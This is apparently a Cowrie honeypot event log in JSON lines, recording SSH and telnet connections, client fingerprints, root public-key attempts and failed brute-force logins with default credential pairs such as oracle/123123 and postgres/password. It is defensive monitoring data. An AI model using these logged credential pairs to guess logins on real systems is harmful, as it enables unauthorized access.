{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:31.652444Z","src_ip":"212.227.125.160","session":"3060a58009ae"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:31.653388Z","src_ip":"212.227.125.160","session":"3060a58009ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41081,"dst_ip":"1.2.3.4","dst_port":23,"session":"46ceda37af95","protocol":"telnet","message":"New connection: 212.227.235.229:41081 (1.2.3.4:23) [session: 46ceda37af95]","sensor":"my-vps","timestamp":"2025-08-28T11:49:45.724226Z"}
{"eventid":"cowrie.session.closed","duration":12.422743082046509,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:58.146885Z","src_ip":"212.227.235.229","session":"46ceda37af95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33772,"dst_ip":"1.2.3.4","dst_port":22,"session":"02decba63890","protocol":"ssh","message":"New connection: 212.227.125.160:33772 (1.2.3.4:22) [session: 02decba63890]","sensor":"my-vps","timestamp":"2025-08-28T11:50:15.350734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:50:15.414599Z","src_ip":"212.227.125.160","session":"02decba63890"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:50:15.527343Z","src_ip":"212.227.125.160","session":"02decba63890"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123123","message":"login attempt [oracle/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T11:50:16.247736Z","src_ip":"212.227.125.160","session":"02decba63890"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:50:17.424098Z","src_ip":"212.227.125.160","session":"02decba63890"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46776,"dst_ip":"1.2.3.4","dst_port":22,"session":"b455f676d61c","protocol":"ssh","message":"New connection: 212.227.125.160:46776 (1.2.3.4:22) [session: b455f676d61c]","sensor":"my-vps","timestamp":"2025-08-28T11:51:03.610415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:51:03.611227Z","src_ip":"212.227.125.160","session":"b455f676d61c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:51:03.780726Z","src_ip":"212.227.125.160","session":"b455f676d61c"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"111111","message":"login attempt [oracle/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T11:51:04.289831Z","src_ip":"212.227.125.160","session":"b455f676d61c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:51:05.460456Z","src_ip":"212.227.125.160","session":"b455f676d61c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46064,"dst_ip":"1.2.3.4","dst_port":22,"session":"699eab6c0253","protocol":"ssh","message":"New connection: 212.227.235.229:46064 (1.2.3.4:22) [session: 699eab6c0253]","sensor":"my-vps","timestamp":"2025-08-28T11:51:06.284685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:51:06.285334Z","src_ip":"212.227.235.229","session":"699eab6c0253"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T11:51:06.389647Z","src_ip":"212.227.235.229","session":"699eab6c0253"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"74:af:e9:73:7d:d5:ae:0e:c9:68:47:04:11:36:a8:8b","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAhdJ7lE0pb8sCbmPw+G3yAAqRQkGz5up3dVDjSnxD4UepzgN7JUXrUOUHk8L1gSqQKFUkpBi2Y+xKInATS//Ju4jgSed6TqF8R6tCkxgzIIfabU5JxPKO5F9oNeM7JGximIGKO6vl30/q8VUXkmE5qbK4QUiJkJ0VzT+eoHbt6fk77+NcYgk5tuEQqpo4NnBo3ntJdaUQZGdEjcBvtixU6U4yiHdx1YsAiBHxLV9NtbpdIEO0ZYM3YxGleGz2nIsL9+LfvnbTR28Q5Cu0UtS4binHVr+ioImrv5EZI+0BOr9FQeZXy5wl9od6WJyJCLU5dgfxVy3antPrEVMeaE3gew==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 74:af:e9:73:7d:d5:ae:0e:c9:68:47:04:11:36:a8:8b","sensor":"my-vps","timestamp":"2025-08-28T11:51:06.598935Z","src_ip":"212.227.235.229","session":"699eab6c0253"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"74:af:e9:73:7d:d5:ae:0e:c9:68:47:04:11:36:a8:8b","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAhdJ7lE0pb8sCbmPw+G3yAAqRQkGz5up3dVDjSnxD4UepzgN7JUXrUOUHk8L1gSqQKFUkpBi2Y+xKInATS//Ju4jgSed6TqF8R6tCkxgzIIfabU5JxPKO5F9oNeM7JGximIGKO6vl30/q8VUXkmE5qbK4QUiJkJ0VzT+eoHbt6fk77+NcYgk5tuEQqpo4NnBo3ntJdaUQZGdEjcBvtixU6U4yiHdx1YsAiBHxLV9NtbpdIEO0ZYM3YxGleGz2nIsL9+LfvnbTR28Q5Cu0UtS4binHVr+ioImrv5EZI+0BOr9FQeZXy5wl9od6WJyJCLU5dgfxVy3antPrEVMeaE3gew==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T11:51:06.599564Z","src_ip":"212.227.235.229","session":"699eab6c0253"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"74:af:e9:73:7d:d5:ae:0e:c9:68:47:04:11:36:a8:8b","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAhdJ7lE0pb8sCbmPw+G3yAAqRQkGz5up3dVDjSnxD4UepzgN7JUXrUOUHk8L1gSqQKFUkpBi2Y+xKInATS//Ju4jgSed6TqF8R6tCkxgzIIfabU5JxPKO5F9oNeM7JGximIGKO6vl30/q8VUXkmE5qbK4QUiJkJ0VzT+eoHbt6fk77+NcYgk5tuEQqpo4NnBo3ntJdaUQZGdEjcBvtixU6U4yiHdx1YsAiBHxLV9NtbpdIEO0ZYM3YxGleGz2nIsL9+LfvnbTR28Q5Cu0UtS4binHVr+ioImrv5EZI+0BOr9FQeZXy5wl9od6WJyJCLU5dgfxVy3antPrEVMeaE3gew==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 74:af:e9:73:7d:d5:ae:0e:c9:68:47:04:11:36:a8:8b","sensor":"my-vps","timestamp":"2025-08-28T11:51:06.703367Z","src_ip":"212.227.235.229","session":"699eab6c0253"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"74:af:e9:73:7d:d5:ae:0e:c9:68:47:04:11:36:a8:8b","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAhdJ7lE0pb8sCbmPw+G3yAAqRQkGz5up3dVDjSnxD4UepzgN7JUXrUOUHk8L1gSqQKFUkpBi2Y+xKInATS//Ju4jgSed6TqF8R6tCkxgzIIfabU5JxPKO5F9oNeM7JGximIGKO6vl30/q8VUXkmE5qbK4QUiJkJ0VzT+eoHbt6fk77+NcYgk5tuEQqpo4NnBo3ntJdaUQZGdEjcBvtixU6U4yiHdx1YsAiBHxLV9NtbpdIEO0ZYM3YxGleGz2nIsL9+LfvnbTR28Q5Cu0UtS4binHVr+ioImrv5EZI+0BOr9FQeZXy5wl9od6WJyJCLU5dgfxVy3antPrEVMeaE3gew==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T11:51:06.703990Z","src_ip":"212.227.235.229","session":"699eab6c0253"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:51:16.284808Z","src_ip":"212.227.235.229","session":"699eab6c0253"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62178,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad84d6d68364","protocol":"ssh","message":"New connection: 217.72.205.35:62178 (1.2.3.4:22) [session: ad84d6d68364]","sensor":"my-vps","timestamp":"2025-08-28T11:51:42.287488Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:51:42.288822Z","src_ip":"217.72.205.35","session":"ad84d6d68364"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34000,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1ae7c14f3b2","protocol":"ssh","message":"New connection: 212.227.125.160:34000 (1.2.3.4:22) [session: f1ae7c14f3b2]","sensor":"my-vps","timestamp":"2025-08-28T11:51:48.294214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:51:48.295583Z","src_ip":"212.227.125.160","session":"f1ae7c14f3b2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:51:48.471397Z","src_ip":"212.227.125.160","session":"f1ae7c14f3b2"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1234567","message":"login attempt [oracle/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T11:51:49.180908Z","src_ip":"212.227.125.160","session":"f1ae7c14f3b2"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:51:50.359751Z","src_ip":"212.227.125.160","session":"f1ae7c14f3b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48352,"dst_ip":"1.2.3.4","dst_port":22,"session":"96fb908d6723","protocol":"ssh","message":"New connection: 212.227.125.160:48352 (1.2.3.4:22) [session: 96fb908d6723]","sensor":"my-vps","timestamp":"2025-08-28T11:52:29.856927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:52:29.892552Z","src_ip":"212.227.125.160","session":"96fb908d6723"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:52:30.079031Z","src_ip":"212.227.125.160","session":"96fb908d6723"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T11:52:30.758456Z","src_ip":"212.227.125.160","session":"96fb908d6723"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:52:32.016328Z","src_ip":"212.227.125.160","session":"96fb908d6723"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37514,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ff34fc7e1a4","protocol":"ssh","message":"New connection: 212.227.125.160:37514 (1.2.3.4:22) [session: 9ff34fc7e1a4]","sensor":"my-vps","timestamp":"2025-08-28T11:53:08.829020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:53:08.829949Z","src_ip":"212.227.125.160","session":"9ff34fc7e1a4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:53:09.072337Z","src_ip":"212.227.125.160","session":"9ff34fc7e1a4"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"password","message":"login attempt [postgres/password] failed","sensor":"my-vps","timestamp":"2025-08-28T11:53:09.616823Z","src_ip":"212.227.125.160","session":"9ff34fc7e1a4"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:53:10.790026Z","src_ip":"212.227.125.160","session":"9ff34fc7e1a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63337,"dst_ip":"1.2.3.4","dst_port":22,"session":"01515a33da05","protocol":"ssh","message":"New connection: 212.227.125.160:63337 (1.2.3.4:22) [session: 01515a33da05]","sensor":"my-vps","timestamp":"2025-08-28T11:53:20.856646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T11:53:20.857569Z","src_ip":"212.227.125.160","session":"01515a33da05"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T11:53:20.969972Z","src_ip":"212.227.125.160","session":"01515a33da05"}
{"eventid":"cowrie.login.failed","username":"deborah","password":"deborah","message":"login attempt [deborah/deborah] failed","sensor":"my-vps","timestamp":"2025-08-28T11:53:21.511726Z","src_ip":"212.227.125.160","session":"01515a33da05"}
{"eventid":"cowrie.login.failed","username":"deborah","password":"deborah1","message":"login attempt [deborah/deborah1] failed","sensor":"my-vps","timestamp":"2025-08-28T11:53:22.628615Z","src_ip":"212.227.125.160","session":"01515a33da05"}
{"eventid":"cowrie.login.failed","username":"deborah","password":"deborah123","message":"login attempt [deborah/deborah123] failed","sensor":"my-vps","timestamp":"2025-08-28T11:53:23.742879Z","src_ip":"212.227.125.160","session":"01515a33da05"}
{"eventid":"cowrie.login.failed","username":"deborah","password":"deborah1234","message":"login attempt [deborah/deborah1234] failed","sensor":"my-vps","timestamp":"2025-08-28T11:53:24.830958Z","src_ip":"212.227.125.160","session":"01515a33da05"}
{"eventid":"cowrie.login.failed","username":"deborah","password":"deborah12345","message":"login attempt [deborah/deborah12345] failed","sensor":"my-vps","timestamp":"2025-08-28T11:53:25.945153Z","src_ip":"212.227.125.160","session":"01515a33da05"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:53:27.058401Z","src_ip":"212.227.125.160","session":"01515a33da05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35242,"dst_ip":"1.2.3.4","dst_port":22,"session":"406970019554","protocol":"ssh","message":"New connection: 212.227.125.160:35242 (1.2.3.4:22) [session: 406970019554]","sensor":"my-vps","timestamp":"2025-08-28T11:53:48.415006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:53:48.415970Z","src_ip":"212.227.125.160","session":"406970019554"}
